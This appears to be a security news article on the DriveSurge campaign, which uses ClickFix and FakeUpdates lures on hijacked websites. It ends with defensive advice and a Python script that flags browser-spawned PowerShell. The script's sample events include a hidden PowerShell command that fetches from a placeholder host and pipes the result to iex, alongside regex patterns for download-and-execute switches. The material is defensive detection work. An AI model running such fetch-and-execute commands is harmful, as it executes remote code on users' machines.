Security researchers have identified a threat actor operating under the name DriveSurge that has compromised thousands of websites to distribute malware through two distinct attack techniques — ClickFix and FakeUpdates — in what analysts describe as a notable convergence of campaigns that are more commonly tracked in isolation.
According to a report published by BleepingComputer, the operation deploys both attack methods at a large scale across hijacked sites, leveraging the reach of legitimate but compromised web properties to lure victims into executing malicious payloads.
Two Attack Chains, One Operator
ClickFix and FakeUpdates are both well-known social engineering techniques that trick users into interacting with deceptive browser overlays or fake update prompts. Historically, security teams have observed them deployed by different groups in separate campaigns. DriveSurge's decision to bundle both into a shared infrastructure marks an operational maturity that defenders say warrants close attention.
ClickFix, in particular, has seen rapid adoption across the threat landscape in recent months. The technique typically presents users with a fake error or verification prompt, coaxing them into copying and pasting a malicious command into their system — often a PowerShell script that downloads and executes further malware. FakeUpdates, meanwhile, relies on convincing browser update notifications to trick users into running trojanised installers.
By running both techniques simultaneously across a network of compromised sites, DriveSurge maximises its chances of success across different user behaviours and browser environments.
Why This Matters
The convergence of two separately tracked attack techniques under a single operator illustrates a broader trend in the cybercriminal ecosystem: consolidation. Rather than specialising in one method, well-resourced actors are building multi-vector campaigns that are harder for defenders to attribute and disrupt.
For IT administrators and security teams, the DriveSurge campaign underscores the importance of monitoring web assets for injected scripts and suspicious redirects. Compromised legitimate sites remain one of the most effective delivery mechanisms for social engineering attacks, precisely because users trust the domains they visit.
Defensive Considerations
Organisations looking to protect against campaigns like DriveSurge's should consider the following measures:
- Monitor for unauthorised script injections on web properties, particularly JavaScript that loads external resources or renders overlay elements.
- Educate end users about browser-based social engineering tactics, including fake error messages and unsolicited update prompts.
- Implement Content Security Policy (CSP) headers to restrict which external scripts can execute on corporate or hosted websites.
- Deploy endpoint detection tools capable of identifying suspicious command-line activity, especially PowerShell invocations originating from browser processes.
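As an added illustration of the last bullet (this is example code written for this page, not code from the report or from any DriveSurge tooling), a small Python triage routine that flags PowerShell spawned by a browser, the parent-child chain named above. It assumes process-creation events shaped like Sysmon Event ID 1 records (image, parent image, command line); the sample events are constructed, and the explorer.exe Run-dialog case is an assumption that goes slightly beyond what the article states.

```python
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download-and-execute / hidden-window switches that pasted one-liners rely on;
# matched case-insensitively against the full command line.
INDICATORS = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop(rofile)?\b|"
    r"\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression", re.I)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def assess(event):
    """Return (severity, reasons) for one process-creation event, or None if benign.
    event keys: 'image', 'parent_image', 'command_line' (Sysmon Event ID 1 style)."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    if image not in POWERSHELL:
        return None
    hits = sorted({m.group(0).lower() for m in INDICATORS.finditer(event["command_line"])})
    if parent in BROWSERS:
        # The direct browser -> PowerShell chain the article calls out.
        return "high", ["parent is browser " + parent] + hits
    if parent == "explorer.exe" and hits:
        # Assumption: a command pasted into the Win+R Run dialog is spawned by explorer.exe.
        return "medium", ["launched via explorer.exe (Run dialog?)"] + hits
    return None

SAMPLE_EVENTS = [  # constructed sample telemetry, not real events
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": 'powershell.exe -w hidden -c "iwr http://example.invalid/x | iex"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -NoP -Enc <base64-placeholder>"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell -File C:\\scripts\\backup.ps1"},  # benign admin task
]

def triage(events):
    """Run assess() over a batch and return only the flagged events with their verdicts."""
    return [(e["command_line"], *v) for e in events if (v := assess(e))]

if __name__ == "__main__":
    for cmd, sev, reasons in triage(SAMPLE_EVENTS):
        print(sev.upper(), cmd, "|", "; ".join(reasons))
```

In production the same logic would sit in the EDR or SIEM rule engine rather than a script, and the parent list should be tuned to the browsers actually deployed in the environment.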
The discovery of DriveSurge's dual-technique infrastructure serves as a reminder that the threat landscape continues to consolidate around social engineering as a primary initial access vector. As attackers refine their toolkits and combine methods, defenders must adapt their monitoring and awareness strategies accordingly.